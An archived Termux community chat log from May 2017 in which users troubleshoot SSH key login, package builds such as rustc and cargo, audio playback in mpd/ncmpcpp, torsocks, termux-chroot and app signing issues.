2017-05-20 18:54:18 live_the_dream the ubunta private key is passworded?
2017-05-20 18:54:29 gitter1 (Nevrage) it seems
2017-05-20 18:55:01 gitter1 (Nevrage) when I installed the ``openssh` package it outputed a key I copied on ubuntu and that I am now trying to use
2017-05-20 18:58:43 live_the_dream to be able to login to termux sshd … you need your ubuntu pub key added to termux’s ~/.ssh/authorized_keys file
2017-05-20 18:59:10 live_the_dream cat id_rsa.pub » ~/.ssh/authorized_keys
2017-05-20 18:59:12 live_the_dream on termux
2017-05-20 18:59:39 live_the_dream then ubuntu box and account should be able to login
2017-05-20 19:00:55 gitter1 (Nevrage) I think I understand
2017-05-20 19:01:09 gitter1 (Nevrage) where is the id_rsa.pub located in termux ?/
2017-05-20 19:01:20 gitter1 (Nevrage) or is a file I need to copy from ubuntu ?
2017-05-20 19:03:56 live_the_dream from ubuntu
2017-05-20 19:04:07 live_the_dream so termux sshd knows which keys are authorized
2017-05-20 19:09:00 gitter1 (Nevrage) I’m really lacking knowledge on that and I dont want to ask to much of your time
2017-05-20 19:09:18 gitter1 (Nevrage) just to test termux features, is it long to enable ssh with a password instead ?
2017-05-20 19:11:02 live_the_dream The Termux sshd binary does not support password login
2017-05-20 19:11:25 gitter1 (Nevrage) of course :p
2017-05-20 19:11:44 gitter1 (Nevrage) well I’ll try a bit more with rsa, thank you for your time :)
2017-05-20 19:18:13 sdrausty @hello
2017-05-20 20:11:50 gitter1 (christianrondeau) Hi all! I have a pull request pending on the fisherman
repo (for the fisher
plugin manager for the fish
shell). The maintainer wants another review of my PR before merging, since I’m not seeing any activity, I hope someone else is using fish here and would take a look :) https://github.com/fisherman/fisherman/pull/383
2017-05-20 22:27:59 gitter1 (christianrondeau) (For the record, the pull request is for fixing fisherman so that it is compatible with Termux :P)
2017-05-20 22:28:35 gitter1 (christianrondeau) And to be more precise, it’s not really a review that’s being asked, but rather for someone to “try and confirm that it works”
2017-05-20 23:20:26 gitter1 (vishalbiswas) does poll work in android?
2017-05-21 00:36:52 gitter1 (vishalbiswas) I just created https://github.com/termux/termux-packages/issues/1040 for apache2. If anybody wants to change something, I’ll be happy to do it.
2017-05-21 11:12:17 indio Hi. Is it possible to open browser automatically for a url in context menu ?
2017-05-21 11:14:42 morlog long press on the link and it should open in a browser
2017-05-21 11:14:51 morlog in the context menu
2017-05-21 11:16:13 indio ohhh cool!! thanks :)
2017-05-21 11:19:03 morlog np
2017-05-21 11:19:18 morlog took me a bit to figure that out as well
2017-05-21 11:35:06 indio i totally missed it :p
2017-05-21 20:39:50 Manuel15 Hi, I’m trying to install a module with luarocks on Termux, lpeg, but it fails and gives this error. Is it possible to fix this? https://www.irccloud.com/pastebin/v1l2ULYJ
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:54:13 =!= irc: you are not connected to server
2017-05-21 20:55:43 sdrausty Manual15: Try: dpkg --search lua.h
2017-05-21 20:56:45 sdrausty It is in liblua-dev
2017-05-21 21:41:33 Manuel15 sdrausty: thanks
2017-05-22 13:59:50 gitter1 (vishalbiswas) can someone from aarch64 post their llvm-config --cppflags --cflags --cxxflags --ldflags
2017-05-22 14:00:58 frumpylava @vishalbiswas
2017-05-22 14:01:13 frumpylava llvm-config –cppflags –cflags –cxxflags –ldflags
2017-05-22 14:01:15 frumpylava -I/data/data/com.termux/files/usr/include -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS
2017-05-22 14:01:17 frumpylava -I/data/data/com.termux/files/usr/include -Os -I/data/data/com.termux/files/usr/include -fPIC -Wall -W -Wno-unused-parameter -Wwrite-strings -Wmissing-field-initializers -pedantic -Wno-long-long -Wcovered-switch-default -Wdelete-non-virtual-dtor -Wstring-conversion -Werror=date-time -ffunction-sections -fdata-sections -Os -DNDEBUG -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS
2017-05-22 14:01:19 frumpylava -I/data/data/com.termux/files/usr/include -Os -I/data/data/com.termux/files/usr/include -fPIC -fvisibility-inlines-hidden -Wall -W -Wno-unused-parameter -Wwrite-strings -Wcast-qual -Wmissing-field-initializers -pedantic -Wno-long-long -Wcovered-switch-default -Wnon-virtual-dtor -Wdelete-non-virtual-dtor -Wstring-conversion -Werror=date-time -std=c++11 -ffunction-sections -fdata-sections -Os -DNDEBUG
2017-05-22 14:01:21 frumpylava -fno-exceptions -fno-rtti -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS
2017-05-22 14:01:23 frumpylava -L/data/data/com.termux/files/usr/lib
2017-05-22 14:09:58 sdrausty @vishalbiswas https://gist.github.com/sdrausty/0f1715d52b51f6aee0f4b3e34c0908a1
2017-05-22 22:48:13 gitter1 (vishalbiswas) thank you sdrausty and frumpylava
2017-05-22 23:08:29 live_the_dream_s hmmm is mosh not working after libprotobuf upgrad3?
2017-05-23 00:33:27 live_the_dream_s also the ncmpcpp default settings isn’t working with mpd ? should probably fix ithat i guess
2017-05-23 00:59:47 gitter1 (vishalbiswas) live_the_dream: do you know how would I install a cross compiled rustc? running make install installs the build machine rustc
2017-05-23 01:15:10 live_the_dream_s so you have the cross compiled rustc?
2017-05-23 01:44:00 gitter1 (vishalbiswas) almost ready, need to test run and split into sub packages
2017-05-23 01:45:15 gitter1 (vishalbiswas) I’m enabling rustc, rust-docs, rust-std and rust-src
2017-05-23 01:53:24 live_the_dream_s has the upgraded libprotobuf broken mosh?
2017-05-23 01:56:35 live_the_dream_s it has
2017-05-23 01:59:15 live_the_dream_s fornwall: mosh needs version number push so it’s compiled against new libprotobuf
2017-05-23 13:06:53 gitter1 (spences10) Hello termuxers
2017-05-23 13:07:34 gitter1 (natebass) Hi
2017-05-23 13:07:50 gitter1 (spences10) I’m getting permission errors after termux-setup-storage
2017-05-23 13:08:07 gitter1 (spences10) I’m trying to install now
2017-05-23 13:08:17 gitter1 (spences10) Via npm
2017-05-23 13:08:27 gitter1 (spences10) Get errors like:
2017-05-23 13:09:12 gitter1 (spences10) ```
2017-05-23 13:09:13 gitter1 (spences10)
2017-05-23 13:09:13 gitter1 (spences10) ```
2017-05-23 13:09:35 gitter1 (spences10) at process._tickCallback (internal/process/next_tick.js:109:7)
2017-05-23 13:09:35 gitter1 (spences10) npm ERR! Linux 3.18.31-perf+
2017-05-23 13:09:35 gitter1 (spences10) npm ERR! argv “/data/data/com.termux/files/usr/bin/node” “/data/data/com.termux/files/usr/bin/npm” “i” “-g” “now@latest”
2017-05-23 13:09:35 gitter1 (spences10) [full message: https://gitter.im/termux/termux?at=59246ccdf3001cd3424f2ddb]
2017-05-23 13:09:50 gitter1 (spences10) Sorry for all the tex
2017-05-23 13:10:13 gitter1 (natebass) Yea me to when I npm install -g now
2017-05-23 13:14:51 gitter1 (spences10) It worked yesterday
2017-05-23 13:19:43 sdrausty npm ERR @ https://gist.github.com/sdrausty/a7d52950ab51b07f36e9bc86d08dcaf6
2017-05-23 13:19:50 gitter1 (natebass) I just started using termux today after a really long time I don’t know if anything changed
2017-05-23 14:38:50 Gilfoyle- fornwall: You rebuilt ncmpcpp/mpd yeah? Because I updated but it’s still failing to detect a connection within ncmpcpp.
2017-05-23 14:54:14 fornwall Gilfoyle-: hm, I think I built a version without the patch - can you try updating again, now to version 0.8-2 of ncmpcpp?
2017-05-23 14:57:02 Gilfoyle- F
2017-05-23 14:57:33 Gilfoyle- fornwall: Running update causes ncmpcpp to quit. Upon restart it refuses a connection with mpd, and mpd is killed. :P
2017-05-23 14:58:12 fornwall Gilfoyle-: hm :)
2017-05-23 14:58:45 fornwall Gilfoyle-: which arch (uname -m)?
2017-05-23 14:59:16 Gilfoyle- Armv71
2017-05-23 15:00:47 Gilfoyle- On a nexus 6.
2017-05-23 19:23:54 TinfoilHat fornwall: Any luck?
2017-05-23 19:42:58 live_the_dreams if mpd is giving you trouble try deleting ~/.mpd/database
2017-05-23 19:43:01 TinfoilHat Also, stupid question but where better to ask. Anybody gotten rifle to open web/html links directly with the built in chrome app/a browser?
2017-05-23 19:43:07 TinfoilHat Aye, thanks live_the_dreams
2017-05-23 19:45:22 live_the_dreams fix it?
2017-05-23 19:45:35 TinfoilHat Eyep. Danke
2017-05-23 19:45:40 live_the_dreams np
2017-05-23 19:46:33 TinfoilHat New error though. :P
2017-05-23 19:46:54 live_the_dreams what error?
2017-05-23 19:47:01 live_the_dreams “no database”
2017-05-23 19:47:04 live_the_dreams ?
2017-05-23 19:47:05 TinfoilHat Pressing p to pause.
2017-05-23 19:47:17 live_the_dreams what happens?
2017-05-23 19:47:35 TinfoilHat Hitting it again to play, cause it to say playing but no sound output or song progression.
2017-05-23 19:48:27 live_the_dreams oh
2017-05-23 19:53:18 live_the_dreams ok easy solution is to disable sles and enable openal
2017-05-23 19:53:26 live_the_dreams pause works
2017-05-23 19:53:43 live_the_dreams looks to be a sles issue i am very familiar with
2017-05-23 19:53:49 live_the_dreams as in opensles
2017-05-23 19:54:12 live_the_dreams android sound is shit
2017-05-23 19:55:13 TinfoilHat Gotcha. So just commen out that output block and open the openal one?
2017-05-23 19:55:29 live_the_dreams you can do it from within ncmpcpp
2017-05-23 19:55:50 live_the_dreams press 7
2017-05-23 19:56:24 live_the_dreams its also where you can enable the visualizer stream so visulization works
2017-05-23 19:58:06 live_the_dreams hmm a way to get around the opensles can’t pause might be to do pause in a different way. by saving the position and restarting the file from that position
2017-05-23 19:58:41 TinfoilHat Ugh. This reminds me of porting stuff to the pandora back in the day.
2017-05-23 19:59:04 TinfoilHat Hmm. Reminds me, I need to go work on a patch for bitlbee. Time to do some reversing. >_>
2017-05-23 20:00:22 TinfoilHat Hmm, visualizer fails with “can’t open /tmp/mpd.conf”
2017-05-23 20:02:40 TinfoilHat mpd.fifo*
2017-05-23 20:02:45 TinfoilHat But, not that important.
2017-05-23 20:08:32 live_the_dreams i will fix that stuff now
2017-05-23 20:10:08 TinfoilHat Aye
2017-05-23 20:10:33 TinfoilHat Back to getting ranger/rifle to open chrome then.
2017-05-23 20:10:35 TinfoilHat Away I go!
2017-05-23 20:11:43 live_the_dreams fifo solution cp /data/data/com.termux/files/usr/share/doc/ncmpcpp/config ~/.ncmpcpp/config
2017-05-23 20:11:59 live_the_dreams didn’t install configs properly
2017-05-23 20:12:00 live_the_dreams my fault
2017-05-23 20:17:04 TinfoilHat Heh, aye.
2017-05-23 20:56:39 live_the_dreams k i got pause working for sles
2017-05-23 20:58:36 live_the_dreams now im done for the day
2017-05-23 21:03:18 Church- Heh, aye.
2017-05-23 22:57:10 gitter1 (vishalbiswas) how to remove ignore -Wl,--as-needed
in linker args?
2017-05-24 01:50:18 live_the_dreams you still need that answered vish?
2017-05-24 01:51:19 gitter1 (vishalbiswas) live_the_dream: which one?
2017-05-24 01:53:03 live_the_dreams remove flags
2017-05-24 01:53:15 live_the_dreams ?
2017-05-24 01:54:39 gitter1 (vishalbiswas) i just changed the linker to clang, it ignores them automatically
2017-05-24 01:54:48 gitter1 (vishalbiswas) is there a better way?
2017-05-24 01:57:11 live_the_dreams C++FLAGS:=$(filter-out -O3,$(C++FLAGS))
2017-05-24 01:57:42 live_the_dreams in the makefile
2017-05-24 01:58:28 gitter1 (vishalbiswas) rustc was adding it internally so …
2017-05-24 01:58:34 Church- Just curious, somebody mind looking at my tsu script? Seems that PATH isn’t set correctly. So no utilities are passed in.
2017-05-24 01:59:21 gitter1 (vishalbiswas) anyways I just updated https://github.com/termux/termux-packages/pull/1047, so rust should be ready to roll
2017-05-24 01:59:32 Church- https://pastebin.com/LCG1h5X6
2017-05-24 01:59:41 Church- Visha, sweet.
2017-05-24 02:06:37 Church- This is driving me nuts. No edit follows through and is exported.
2017-05-24 02:18:17 live_the_dreams newline at end of file needed?
2017-05-24 02:21:31 live_the_dreams oh well
2017-05-24 02:21:49 live_the_dreams on device building takes fucking ages
2017-05-24 02:21:55 live_the_dreams which means its more important i do it
2017-05-24 02:26:57 Church- Heh, aye
2017-05-24 05:47:55 u0_a233 $ su
2017-05-24 05:47:57 u0_a233 root@D2303:/data/data/com.termux/files/home # nano
2017-05-24 05:47:59 u0_a233 k_shell/10233:8735: nano: not found
2017-05-24 05:48:03 u0_a233 what is this :/
2017-05-24 06:02:15 u0_a233 anyone?
2017-05-24 06:10:33 live_the_dreams ?
2017-05-24 06:10:55 live_the_dreams use tsu not su to use termux stuff as root
2017-05-24 06:10:59 live_the_dreams apt install tsu
2017-05-24 06:14:39 u0_a233 $ tsu
2017-05-24 06:14:41 u0_a233 unknown option – preserve-environment
2017-05-24 06:15:44 live_the_dreams which root binary are you using?
2017-05-24 06:16:34 u0_a233 kingroot
2017-05-24 06:17:34 u0_a233 su worked for some time in termux, but now doesn’t
2017-05-24 06:18:25 live_the_dreams no idea about king root
2017-05-24 06:20:27 u0_a233 it was working till now :/
2017-05-24 08:44:07 live_the_dreams “businessdayconventions.o businessdayconventions.cpp” … indeed
2017-05-24 09:27:26 u0_a144 hello
2017-05-24 09:27:46 u0_a144 termux
2017-05-24 09:28:08 u0_a144 I need to learn something
2017-05-24 09:28:31 u0_a144 I am a newborn
2017-05-24 09:28:53 u0_a144 could anyone help me?
2017-05-24 09:29:21 u0_a144 Goodbye
2017-05-24 09:31:29 u0_a144 Hello
2017-05-24 09:31:35 u0_a144 I come here
2017-05-24 09:31:43 u0_a144 I’m so fool
2017-05-24 09:32:11 u0_a144 Who can teach me some skills?
2017-05-24 15:14:04 phil42 don’t eat yellow snow
2017-05-24 20:25:57 code2501 hi
2017-05-24 20:26:44 live_the_dreams bello
2017-05-24 20:27:33 live_the_dreams a3w
2017-05-24 20:27:34 live_the_dreams aww
2017-05-24 20:52:20 PharaohChurch- Heh
2017-05-25 00:13:51 PharaohChurch- Hey fornwall, got a question about torsocks since it’s giving me an error.
2017-05-25 00:16:01 PharaohChurch- fornwall: https://pastebin.com/73ZzL4cU
2017-05-25 00:16:23 PharaohChurch- Failing when I run torsocks in front of a ssh command.
2017-05-25 00:22:30 PharaohChurch- Actually, looks like all outbound net connections don’t work…
2017-05-25 00:28:48 gitter1 (vishalbiswas) PharaohChurch: is tor running?
2017-05-25 00:29:23 gitter1 (vishalbiswas) you need to enable socks5 proxy in tor and start it, then you can use torsocks
2017-05-25 00:39:05 PharaohChurch- Should be running. Icenabled it.
2017-05-25 00:39:11 PharaohChurch- I enabled*
2017-05-25 00:40:35 gitter1 (vishalbiswas) what port is it listening on?
2017-05-25 00:40:52 gitter1 (vishalbiswas) by default, this is 9050
2017-05-25 00:51:05 PharaohChurch- Yeah, I’m an idiot. Changed the port on accident.
2017-05-25 00:51:15 PharaohChurch- Seems to hang while bootstrapping however.
2017-05-25 01:01:38 live_the_dreams hmm ndk 15 beta 2… i wonder if things don’t suck yet
2017-05-25 01:01:57 gitter1 (vishalbiswas) if gcc is removed, things suck more than ever
2017-05-25 01:02:02 live_the_dreams no
2017-05-25 01:02:12 live_the_dreams its not removed yet
2017-05-25 01:02:23 live_the_dreams 17 at earliest
2017-05-25 01:02:40 gitter1 (vishalbiswas) yesh, they keep pushing it back
2017-05-25 01:05:58 PharaohChurch- Rustc is getting added to the repo, yeah?
2017-05-25 01:06:54 gitter1 (vishalbiswas) I’m finished with the changes, so its upto @fornwall to add it.
2017-05-25 01:07:38 PharaohChurch- Aye.
2017-05-25 01:08:18 gitter1 (vishalbiswas) though, it will take some time as this adds a generous amount of code for reviewing
2017-05-25 01:09:42 PharaohChurch- Aye
2017-05-25 01:18:25 gitter1 (vishalbiswas) does parity-bitcoin download the whole bitcoin history like bitcoind?
2017-05-25 01:18:55 live_the_dreams i will probably upload some builds later today
2017-05-25 01:19:35 gitter1 (vishalbiswas) which ones?
2017-05-25 01:20:01 live_the_dreams rustc
2017-05-25 01:20:12 live_the_dreams i am doing all the pull requests
2017-05-25 01:20:46 gitter1 (vishalbiswas) make sure you rebuild libllvm with the config wrapper pull request
2017-05-25 01:21:01 live_the_dreams yeah i already knew that
2017-05-25 01:21:21 gitter1 (vishalbiswas) thanks for hosting, i appreciate it
2017-05-25 01:21:30 live_the_dreams its not me hosting
2017-05-25 01:21:37 gitter1 (vishalbiswas) hehe
2017-05-25 01:23:46 live_the_dreams i hope no one expects me to get julia lang working
2017-05-25 01:23:52 live_the_dreams just because rust can be done
2017-05-25 01:24:28 live_the_dreams julia just got arm hardfloat semi support
2017-05-25 01:24:45 gitter1 (vishalbiswas) what is it exactly?
2017-05-25 01:24:58 live_the_dreams science and engineering stuff
2017-05-25 01:25:22 gitter1 (vishalbiswas) you’ve tried it earlier?
2017-05-25 01:25:32 live_the_dreams tried to compile it?
2017-05-25 01:25:35 live_the_dreams yeah
2017-05-25 01:26:34 gitter1 (vishalbiswas) its interpreted? or compiled? their homepage is comparing it to most other interpreted langs
2017-05-25 01:28:07 live_the_dreams its jit. Its probably going to overtake R and others eventually because its faster
2017-05-25 01:29:26 gitter1 (vishalbiswas) seems like every new language is piggybacking on llvm, we have rust, kotlin-native, julia, and more i don’t know about
2017-05-25 01:29:42 live_the_dreams yeah
2017-05-25 01:29:44 live_the_dreams llvm
2017-05-25 01:29:51 live_the_dreams people wanted to make plugins to gcc
2017-05-25 01:30:19 live_the_dreams but gnu doesn’t like even the possibility of propriatariness
2017-05-25 01:34:08 gitter1 (vishalbiswas) btw, installing packages with cargo takes forever, at least on arm
2017-05-25 06:31:57 live_the_dreams hmmm …
2017-05-25 08:03:13 live_the_dreams vish building cargo doesn;t find termux cmake in _cache
2017-05-25 13:42:57 gitter1 (vishalbiswas) Its missing a termux_setup_cmake. I had one installed. I’ll update it tomorrow.
2017-05-25 16:04:59 aleph- So, I’m curious what error could cause termux from the play store to install fine. But not on fdroid/as a apk?
2017-05-25 16:06:33 fornwall aleph-: all termux apps are required to be signed with the same signature, and fdroid uses a different signature than the google play version
2017-05-25 16:06:59 aleph- Ahhh. Gotcha. Hmm.
2017-05-25 16:07:07 fornwall aleph-: so, if you have any termux app (main app or add-on) installed from fdroid, you won’t be able to install from google play before you uninstall everything from fdroid
2017-05-25 16:07:12 fornwall and vice versa
2017-05-25 16:08:05 fornwall but you shouldn’t need to mix, the latest add-on only available on google play (termux:float) should now work on fdroid as of version 0.10
2017-05-25 16:08:16 aleph- Well I was just wondering because before installed anything. Termux from frdoid failed due to an unknown error. Where as the play store succeeded.
2017-05-25 16:09:06 fornwall aleph-: that was probably due to an issue with the fdroid build in version 0.49 of termux, which wasn’t installable from fdroid
2017-05-25 16:09:31 fornwall it was just fixed in 0.50, which is available from fdroid and works :)
2017-05-25 16:09:47 aleph- Ahhh. You are correct. Works fine noe.
2017-05-25 16:09:49 aleph- now.*
2017-05-25 16:10:05 aleph- And fuck. Now I need to proliferate new ssh keys everywhere. >_>
2017-05-25 22:44:28 gitter1 (tojo2ska8) hi some there is run postgresql ? helplease
2017-05-25 22:50:38 gitter1 (vishalbiswas) @tojo2ska8 what do you need help with?
2017-05-25 23:24:48 gitter1 (vishalbiswas) live_the_dream: I just fixed cargo, try a rebuild
2017-05-25 23:40:24 gitter1 (tojo2ska8) @vishalbiswas was trying install and run postgresql and i had problems but finally i get run it :) thanks and now a im trying conect postgresql with pgadmin apk
2017-05-25 23:53:28 u0_a155 hello all
2017-05-25 23:53:54 gitter1 (vishalbiswas) hi
2017-05-25 23:54:51 u0_a155 do you know how to access Transmission after installing it in termux? is it command line interface based only?
2017-05-25 23:55:28 gitter1 (vishalbiswas) it has a web based interface too
2017-05-25 23:55:30 u0_a155 ive been avle to get a lot of functions to work for this but they are all CLI based so far.
2017-05-25 23:56:20 gitter1 (vishalbiswas) navigate to http://127.0.0.1:9091
to access it in a browser
2017-05-25 23:56:41 gitter1 (vishalbiswas) or you can even use transdroid from the play store to manage it
2017-05-25 23:57:07 gitter1 (vishalbiswas) using transdroid requires you to configure the rpc server, though
2017-05-25 23:57:59 u0_a155 i got you. so but how can i activate Transmission within termux? inputting “transmission” does nothing
2017-05-25 23:58:39 gitter1 (vishalbiswas) transmission-daemon
to start the daemon
2017-05-25 23:58:48 gitter1 (vishalbiswas) then you can use the web interface
2017-05-25 23:59:03 u0_a155 ahhhhh perfect! thank you :)
2017-05-25 23:59:59 u0_a155 and with that I’ll be off. thanks again
2017-05-26 00:00:03 u0_a155 exit
2017-05-26 00:00:08 u0_a155 lol
2017-05-26 00:00:16 u0_a155 whoops
2017-05-26 00:33:14 live_the_dreams cargo working ripgrep working good work vish
2017-05-26 00:35:01 gitter1 (vishalbiswas) live_the_dream: I’ve been trying to get parity to install, but, syntex_syntax (->js-precompiled->parity) never completes. just goes on forever
2017-05-26 00:40:47 gitter1 (tojo2ska8) i get conect pgadmin apk with postgresql termux :D
2017-05-26 00:41:28 gitter1 (tojo2ska8) now i go to bed seeya dudes
2017-05-26 01:30:46 live_the_dreams is there a reason rust is compiling single thread ?
2017-05-26 01:30:49 live_the_dreams takes its time doing that
2017-05-26 01:54:30 gitter1 (vishalbiswas) that’s what I’m experiencing, too. (it may be because cargo is relying upon thread_local and not pthreads) seems like cargo isn’t ready yet
2017-05-26 22:15:10 Mdawg
2017-05-26 22:15:13 Mdawg Hi0
2017-05-26 22:15:35 gitter1 (vishalbiswas) hey
2017-05-26 22:15:57 Mdawg Hi! Can you help me with termux
2017-05-26 22:16:38 gitter1 (vishalbiswas) what do you need help with?
2017-05-26 22:19:37 gitter1 (jaytula) Is mosh package working again?
2017-05-26 22:20:24 gitter1 (vishalbiswas) @jaytula it should be after the update 3 days ago
2017-05-26 22:20:59 gitter1 (vishalbiswas) make sure you apt update
and apt upgrade
2017-05-26 22:28:15 live_the_dreams k actulaly compiled arm version of rustc so rustc and cargo are on my repo
2017-05-26 22:28:29 live_the_dreams wouldn’t compile until i did a big of fiddling with unwind.h
2017-05-26 22:30:06 gitter1 (vishalbiswas) live_the_dream: so I found this -> https://github.com/rust-lang/rust/commit/c245c5bbad10923b47c9f66d5f0da2913ef11a38
2017-05-26 22:31:37 gitter1 (vishalbiswas) I’ll try to build arm in docker
2017-05-26 22:37:46 live_the_dreams if you want i could enable lto for llvm binutils etc
2017-05-26 22:37:49 live_the_dreams on device
2017-05-26 22:39:07 gitter1 (vishalbiswas) does it have significant performance boost? (the general impression I have of lto is that its too much work, too little worth)
2017-05-26 22:41:01 live_the_dreams not really
2017-05-26 22:41:22 live_the_dreams though it would be required for soem stuff
2017-05-26 22:41:37 live_the_dreams openmp though that requires gcc
2017-05-26 22:41:37 gitter1 (vishalbiswas) like?
2017-05-26 22:41:58 live_the_dreams numba a python module that uses llvm i think needs
2017-05-26 22:42:00 live_the_dreams it
2017-05-26 22:42:18 live_the_dreams it definitly needs gold linker
2017-05-26 22:42:36 gitter1 (vishalbiswas) we use gold by default in termux builds
2017-05-26 22:42:43 live_the_dreams but numba doesn’t work
2017-05-26 22:42:51 live_the_dreams for aarch64
2017-05-26 22:42:54 live_the_dreams i believe
2017-05-26 22:42:57 gitter1 (vishalbiswas) oh yeah
2017-05-26 22:43:04 gitter1 (vishalbiswas) for aarch64 we don’t use gold
2017-05-26 22:43:28 live_the_dreams no its aarch64 for gold only
2017-05-26 22:44:12 gitter1 (vishalbiswas) well, i got it all backward then
2017-05-26 22:45:08 gitter1 (vishalbiswas) you can fiddle around all you want with the Rust packages (I must confess, my knowledge of rust-lang is below amateur)
2017-05-26 22:46:43 live_the_dreams same
2017-05-26 22:49:42 live_the_dreams basically our libunwind package
2017-05-26 22:50:38 live_the_dreams doesn’t implement some stuff on arm
2017-05-26 22:51:04 live_the_dreams so had to add definiton of getip from android stuff https://chromium.googlesource.com/android_tools/+/d2b86205ff973a3844020feacb35ca6b1d82efbe/ndk/sources/android/libportable/arch-arm/unwind.c
2017-05-26 22:52:54 gitter1 (vishalbiswas) but why am I not hit by this roadblock?
2017-05-26 22:53:31 gitter1 (vishalbiswas) maybe this only occurs if rustc is able to find the libunwind.h from our libunwind package
2017-05-26 22:53:54 gitter1 (vishalbiswas) btw, which stage gives you this error?
2017-05-26 22:55:39 live_the_dreams linking the final rustc
2017-05-26 22:55:58 live_the_dreams says _unwind_getip not defined
2017-05-27 00:17:00 gitter1 (vishalbiswas) i can build rustc even after build libunwind on arm
2017-05-27 00:41:10 live_the_dreams weird
2017-05-27 00:41:13 live_the_dreams oh well
2017-05-27 16:37:39 garlic hi all
2017-05-27 22:45:40 rod-yolo [02:26] (live_the_dreams) moon buggy
2017-05-27 22:45:58 live_the_dreams b5??
2017-05-27 22:47:06 gitter1 (vishalbiswas) or you can play with the android easter egg
2017-05-27 22:47:43 rods-tab3 just do: apt install “moon buggy” ## termux has Everything including the kitchen sink
2017-05-27 22:55:17 gitter1 (vishalbiswas) or you can compile sudoku or 2048 (curses). thats what i did
2017-05-28 05:02:52 gitter1 (Tal0is0man) Hi, what about tasker? Tasker don’t see home dir, pls help me)
2017-05-28 06:14:51 gitter1 (bitcoinmeetups) Hello. Is it possible to open a file which is in the Termux home directory with an external Android application?
2017-05-28 06:19:28 live_the_dreams no
2017-05-28 06:22:38 gitter1 (bitcoinmeetups) Is it better in general to use the internal storage as home directory or the extSdCard?
2017-05-28 10:18:36 gitter1 (spences10) I’m getting permission errors with termux
2017-05-28 10:18:47 gitter1 (spences10) What am I doing wrong?
2017-05-28 13:49:03 golrom really loving how termux is coming along
2017-05-28 13:53:26 rods-tab3 try: https://termux.com/storage.html
2017-05-28 13:54:20 rods-tab3 that url should be in the /topic since most often question
2017-05-28 20:59:27 kingofinfo hi
2017-05-28 21:00:34 gitter1 (sdrausty) Hello
2017-05-29 06:32:37 crdroid hello.Any body here?
2017-05-29 06:34:05 live_the_dreams no one
2017-05-29 06:35:03 crdroid em,if no one,why have message’
2017-05-29 06:35:04 crdroid ?
2017-05-29 06:43:19 crdroid welcome to #termux channel
2017-05-29 06:55:00 gitter1 (sdrausty) apt list | grep sql |
2017-05-29 06:56:15 gitter1 (sdrausty) packages list-all | grep sql |
2017-05-29 07:04:35 bokuno i know termux has a “Reset” command on its menu. but could i call this command in termux session as a command line command?
2017-05-29 07:06:39 gitter1 (sdrausty) clear
clears the screen
2017-05-29 07:08:14 bokuno it is not a ‘clear’, reset is not clear.
2017-05-29 08:01:03 gitter1 (sdrausty) Have you ever wanted to build your own application for Android? https://sdrausty.github.io/buildapks/
2017-05-29 09:25:33 noncom hi…
2017-05-29 09:25:44 frumpylava noncom: hi!
2017-05-29 09:25:54 noncom what is make wants to access /usr/ and ofc it cannot do so..?
2017-05-29 09:25:58 noncom is there any env var I can override?
2017-05-29 09:26:04 noncom *what if
2017-05-29 09:26:57 noncom just following some complicated make script, it hits that problem.. I was able to find solutions for other, but not for this.. I can’t find where it takes the notion of /usr
2017-05-29 09:27:06 noncom there is no such text in the Makefile itself
2017-05-29 09:27:41 frumpylava noncom: You could run under termux-chroot, where /usr/ exists.
2017-05-29 09:27:56 noncom hmmmmm
2017-05-29 09:28:28 noncom will it share the filesystem with the regular termux?
2017-05-29 09:28:33 noncom where can I find info on how to use it?
2017-05-29 09:29:16 noncom googling “termux chroot” does not give anything definite… just some related github issues..
2017-05-29 09:29:45 frumpylava noncom: Yes, it just does virtual folder remapping. You probably only have to run termux-chroot while compiling, afterwards the binary should work without.
2017-05-29 09:30:04 noncom so it is a package that I install and then run?
2017-05-29 09:30:22 frumpylava yes. It’s part of proot.
2017-05-29 09:30:37 noncom eh..
2017-05-29 09:33:02 noncom yes, it did it!
2017-05-29 09:33:06 noncom many thanks!
2017-05-29 09:33:14 noncom is there any recommended material to read about this?
2017-05-29 09:35:14 frumpylava noncom: Not really. You can look at the manpage of proot, to see what it exactly does. Termux-chroot is just a bash script. Things like that are poorely documented in Termux. I only know about them from hanging around in this IRC for 2 years.
2017-05-29 09:35:33 frumpylava There is talk about starting a wiki on the mailing-list, where things like that could be documented.
2017-05-29 09:42:11 noncom oh, I see, well, good, thank you :)
2017-05-29 13:59:37 aleph- Afternoon folks
2017-05-29 14:04:30 aleph- vishalbiswas: Got a copy of the rustc/cargo binaries I can test out? I’d compile myself but my build server is down right now.
2017-05-29 16:23:36 sielicki How can I debug segfaults on termux? I’ve got a nexus 5x on the Android O beta. I wiped all the cache/data in the applications android settings, did packages upgrade / packages install python, and doing pip install youtube-dl segfaults
2017-05-29 22:13:33 gitter1 (vishalbiswas) aleph- arch?
2017-05-29 22:13:43 aleph- Arm, regular.
2017-05-29 22:13:49 aleph- On a nexus 6.
2017-05-29 22:19:33 live_the_dreams its on my repo
2017-05-29 22:21:11 gitter1 (vishalbiswas) aleph- https://github.com/its-pointless/gcc_termux follow instructions in readme to add live_the_dream’s repo
2017-05-29 22:21:37 gitter1 (vishalbiswas) He has rustc as well as many other useful packages
2017-05-29 22:21:52 aleph- … I’m a moron. I forgot to re-enable your repo when I reinstalled. :P
2017-05-29 22:24:35 sielicki Anyone have any thoughts on what I said earlier?
2017-05-29 22:25:03 sielicki If someone wouldn’t mind, it’d be cool if one of you with an aarch64 device could try to reproduce. Just pip install youtube-dl
2017-05-29 22:25:13 sielicki If it succeeds I’ll assume android O is to blame.
2017-05-29 22:26:36 gitter1 (vishalbiswas) sielicki: the best thing you could do is run strace -y -f
on it to see whats causing the segfault
2017-05-29 22:27:16 gitter1 (vishalbiswas) live_the_dream: your repo has grown to 640 MB!
2017-05-29 22:27:49 aleph- Vishalbiswas, pre-order the book yet?
2017-05-29 22:28:15 gitter1 (vishalbiswas) you lost me there
2017-05-29 22:29:29 aleph- The rust book.
2017-05-29 22:29:55 aleph- Comes out in October. There’s a rough draft of the second edition.
